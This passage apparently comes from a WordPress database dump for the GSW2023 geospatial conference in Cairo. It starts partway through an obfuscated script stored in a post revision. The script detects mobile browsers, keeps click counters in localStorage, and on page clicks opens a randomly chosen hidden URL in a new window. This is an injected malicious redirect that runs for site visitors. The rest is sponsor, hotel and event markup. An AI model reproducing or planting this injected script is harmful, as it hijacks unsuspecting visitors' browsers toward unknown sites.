)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-27 12:03:33','2023-07-27 12:03:33','',3066,'https://gsw2023.com/?p=5054',0,'revision','',0),
(5055,1,'2023-07-27 12:03:42','2023-07-27 12:03:42','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951344645{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 size-full\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"160\" height=\"190\" /></a></p>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251674466{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The 